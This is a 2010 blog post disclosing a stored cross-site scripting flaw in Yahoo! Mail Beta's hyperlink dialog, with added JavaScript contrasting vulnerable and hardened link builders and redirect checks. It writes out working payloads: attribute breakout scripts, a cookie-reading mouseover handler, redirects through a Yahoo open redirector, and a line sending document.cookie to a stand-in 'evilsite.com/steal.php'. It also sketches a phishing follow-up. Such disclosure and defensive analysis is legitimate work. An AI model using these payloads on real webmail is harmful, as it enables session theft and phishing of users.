Friday, February 12, 2010

Yahoo! Mail Beta - XSS all the way

I briefly looked at the new features and then proceeded onto the new-look Yahoo! Mail. After watching a boy bounce on a green space hopper for a while, with the words "Yahoo loading", I went and got a drink. Eventually, when I got back, it had loaded. Now, I regret to say I was quite impressed with how they laid it all out. It has been designed to look and feel like a piece of email software, like Outlook or Thunderbird. However, the full user interactivity and the different frames gave me a bad feeling (a rich client that renders other people's HTML inside the same page as your logged-in session is exactly where XSS hurts most), so I decided, for my own security reasons, to test out what might happen with a bit of XSS. So firstly, I simply started an email and wrote:

<script>alert("Ohno");</script>

I clicked on send and hoped Yahoo hadn't been that dumb. Opening the email, I found out they hadn't: the script tag in the message body was neutralised. Good for them. So I decided to move it up a step and sent myself an HTML link. This is where the problem started. I wrote the word "Test" and highlighted it, then clicked on their button to make a hyperlink. It gave me the option of choosing different types of links (ftp: etc.), but I stuck with http://. I entered the following:

http://www.yahoo.com">Here</a><script>alert("Ohno");</script>

Clicked OK, and sent the email. Upon picking the email up, I received a pop-up message simply saying "Ohno". Oh no indeed. What is happening is that the URL from the link dialog ends up inside the href="..." attribute of the generated <a> tag without being encoded, so the quote mark closes the attribute, the > closes the tag, and everything after it is parsed as fresh HTML by the recipient's browser. Whatever filter caught the bare script tag in the message body evidently does not look at what the link dialog produces. I had to check that other things were not possible using this flaw, so I tried to view my cookie using an alert box, thinking they may have put in a check for document.cookie:

http://www.yahoo.com" onMouseOver="alert(document.cookie)";

I sent the email, picked it up, and hovered my mouse over the link. A second later an alert box popped up with the information stored in my cookie. (Note that document.cookie only returns cookies that are not flagged HttpOnly, so whatever appeared in that box is exactly what an attacker's script could read and send elsewhere.) This second payload is arguably nastier than the first because it never closes the tag: it stays inside the <a> element as an event-handler attribute, so a filter that only strips <script> tags would let it straight through. Thinking that I could SEE my cookie, I wondered if it was possible to SEND my cookie somewhere, or even get the user to navigate to a web page. "Sure," I thought. "Just change the code to use window.location with a website address and the website should pop up!" So I tried it out:
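The following JavaScript is an added example, not code from the original post and not Yahoo's own. It assumes the link dialog built its markup by concatenating the user-supplied URL straight into the href attribute, which is the only behaviour consistent with the two payloads above firing, and sets that builder beside a hardened one that parses the URL, allowlists the scheme and encodes the attribute. The function names are hypothetical; the two payloads are taken from this post and embedded as constructed input. It runs under Node.js.

```javascript
// Added example, not Yahoo's code. Assumption: the link dialog concatenated
// the user-supplied URL straight into the href attribute, which is the only
// behaviour consistent with the payloads above taking effect.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "ftp:"]);

// Encode the characters that can break out of HTML text or a double-quoted
// attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable builder: trusts the dialog input verbatim, so a quote in the
// URL closes the attribute and everything after it becomes new markup.
function buildLinkUnsafe(text, url) {
  return '<a href="' + url + '">' + text + "</a>";
}

// Hardened builder: parse the URL, allowlist the scheme, re-serialise it,
// then encode both the attribute and the link text. Returns null when the
// URL is rejected so the caller can refuse to insert the link.
function buildLinkSafe(text, url) {
  let parsed;
  try {
    parsed = new URL(url); // throws on a '<', '>' or space in the host part
  } catch (err) {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return null; // rejects javascript:, data:, vbscript: and friends
  }
  // parsed.href is the canonical form; encoding is still needed because a
  // legitimate URL may contain '&' or quotes in its query string.
  return '<a href="' + escapeHtml(parsed.href) + '">' + escapeHtml(text) + "</a>";
}

// True if the produced markup contains a tag or handler the sender did not
// ask for: the two outcomes observed in the post.
function leaksMarkup(html) {
  return /<script|onmouseover=/i.test(html);
}

// The two payloads from the post, used here as constructed input.
const SCRIPT_PAYLOAD = 'http://www.yahoo.com">Here</a><script>alert("Ohno");</script>';
const HANDLER_PAYLOAD = 'http://www.yahoo.com" onMouseOver="alert(document.cookie)";';

for (const payload of [SCRIPT_PAYLOAD, HANDLER_PAYLOAD]) {
  console.log("unsafe:", buildLinkUnsafe("Test", payload));
  console.log("safe:  ", buildLinkSafe("Test", payload)); // null: rejected
}
console.log("safe:  ", buildLinkSafe("Test", "http://www.yahoo.com/?a=1&b=2"));
```

Two defences are layered here on purpose: the URL parser throws on the host part of both payloads (a `<` or a space in a hostname is not parseable), but a URL that parses cleanly can still carry `&` or quotes in its query, so the serialised href is attribute-encoded regardless. The scheme allowlist is what stops a plain `javascript:` link, which no amount of encoding would catch.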

http://www.yahoo.com">Here</a><script>window.location="www.datastronghold.com"</script>

Once picked up, I was dismayed a little, to say the least. It hadn't worked. I was presented instead with a Yahoo error page, saying it was unable to find the link. Now, I know the site is there. YOU know the site is there. So why didn't Yahoo let me get onto it? They have been clever in a little way, to say the least: it seems that only Yahoo sites could be displayed through the lower pane. (One caveat before reading too much into that: the string assigned to window.location above has no http:// scheme, so the browser resolves it as a path relative to the current Yahoo page, and a Yahoo "not found" page is what that would produce whether or not the pane is restricted. This test alone does not settle whether a fully qualified non-Yahoo URL would also have been blocked.) Surely that'll stop any fraud sites, won't it? Of course not. A little simple modification, and the link works fine:


http://www.yahoo.com">Here</a><script>window.location="http://rds.yahoo.com/_ylt=A0geusygW9xE.v4AcCNXNyoA;_ylu=X3oDMTE3N3F0cXNhBGNvbG8DZQRsA1dTMQRwb3MDMgRzZWMDc3IEdnRpZANGNzcyXzEyNQ--/SIG=12bop18fo/EXP=1155378464/**http%3a//www.datastronghold.com"</script>

In case you don't know, the URL shown there is a link that I took from the Yahoo search engine, of the kind it uses when it links out to another page: in other words, an open redirector on a yahoo.com host. Just by visiting a random page through Yahoo and trimming off the URL at the end, you can freely add your own destination, and the XSS script works fine, because any check that only looks at the host of the URL being loaded sees rds.yahoo.com and waves it through. In fact, if the user tries to view any of their other emails, they can't! They are stuck with that page!
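An added example, not code from the original post and not Yahoo's own, showing why a hostname allowlist on the lower pane is defeated by an open redirector on an allowed host. It assumes that the pane check was a hostname allowlist on the URL being loaded, and that the rds.yahoo.com click-through link carries its real destination, percent-encoded, after the "/**" marker, as in the URL quoted above. The function names are hypothetical; the redirector link is the one from this post, embedded as constructed input. It runs under Node.js.

```javascript
// Added example, not Yahoo's code. Assumptions: the lower pane enforced a
// hostname allowlist on the URL being loaded, and the rds.yahoo.com
// click-through link carries its real destination, percent-encoded, after
// the "/**" marker, as in the URL quoted above.

// The redirector link from the post, used here as constructed input.
const RDS_LINK =
  "http://rds.yahoo.com/_ylt=A0geusygW9xE.v4AcCNXNyoA;_ylu=X3oDMTE3N3F0cXNhBGNvbG8DZQRsA1dTMQRwb3MDMgRzZWMDc3IEdnRpZANGNzcyXzEyNQ--/SIG=12bop18fo/EXP=1155378464/**http%3a//www.datastronghold.com";

function hostAllowed(hostname) {
  return hostname === "yahoo.com" || hostname.endsWith(".yahoo.com");
}

// Naive pane check: looks only at the host of the URL about to be loaded.
// This is the check the redirector trick walks straight past.
function naivePaneCheck(urlString) {
  let u;
  try {
    u = new URL(urlString);
  } catch (err) {
    return false;
  }
  return hostAllowed(u.hostname);
}

// Pull the embedded destination out of an rds-style URL, or null if there
// is none. The "/**" convention is taken from the link above.
function extractRedirectTarget(u) {
  const marker = u.pathname.indexOf("/**");
  if (marker === -1) return null;
  try {
    return decodeURIComponent(u.pathname.slice(marker + 3) + u.search);
  } catch (err) {
    return null; // malformed percent-encoding
  }
}

// Stricter check: apply the allowlist to every hop, including the final
// destination, and give up after a few layers of redirect.
function strictPaneCheck(urlString, maxHops = 3) {
  let current = urlString;
  for (let hop = 0; hop <= maxHops; hop++) {
    let u;
    try {
      u = new URL(current);
    } catch (err) {
      return false;
    }
    if (!hostAllowed(u.hostname)) return false;
    const next = extractRedirectTarget(u);
    if (next === null) return true; // no further redirect and host is allowed
    current = next;
  }
  return false; // too many nested redirects to be legitimate
}

console.log("naive :", naivePaneCheck(RDS_LINK));  // true: rds.yahoo.com passes
console.log("strict:", strictPaneCheck(RDS_LINK)); // false: ends at datastronghold.com
console.log("target:", extractRedirectTarget(new URL(RDS_LINK)));
```

The stricter check is a client-side illustration, not a fix: it only knows about one redirector format, and the real remedy is for the redirector itself to validate or sign its target so that an arbitrary destination cannot be appended. Note also that the allowlist compares against ".yahoo.com" with the leading dot, so a look-alike such as notyahoo.com does not pass.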

WARNING: This could lead to exploitative use, such as requesting Yahoo user names and passwords, seeing as the URL is not shown unless you view the page's properties, allowing phishing sites to fake Yahoo logon pages, stating that the user's time on the email account has run out and they need to log in again. This, as well as allowing cookies to be sent to a PHP script, for example:

http://www.yahoo.com">Here</a><script>window.location="http://rds.yahoo.com/_ylt=A0geusygW9xE.v4AcCNXNyoA;_ylu=X3oDMTE3N3F0cXNhBGNvbG8DZQRsA1dTMQRwb3MDMgRzZWMDc3IEdnRpZANGNzcyXzEyNQ--/SIG=12bop18fo/EXP=1155378464/**http%3a//www.evilsite.com/steal.php?"+document.cookie</script>

This is a massive problem for BT and Yahoo. I have yet to find a suitable contact at BT or Yahoo to report this to, so here it is for your educational purposes: Do NOT use Yahoo! Mail Beta. I cannot stress that enough!

Legal note (so I don't get sued): I provide the above information as educational information and in no way encourage or support the misuse of this information.

1 comment:

Unknown said...

security@yahoo-inc.com is a good address to report issues like this.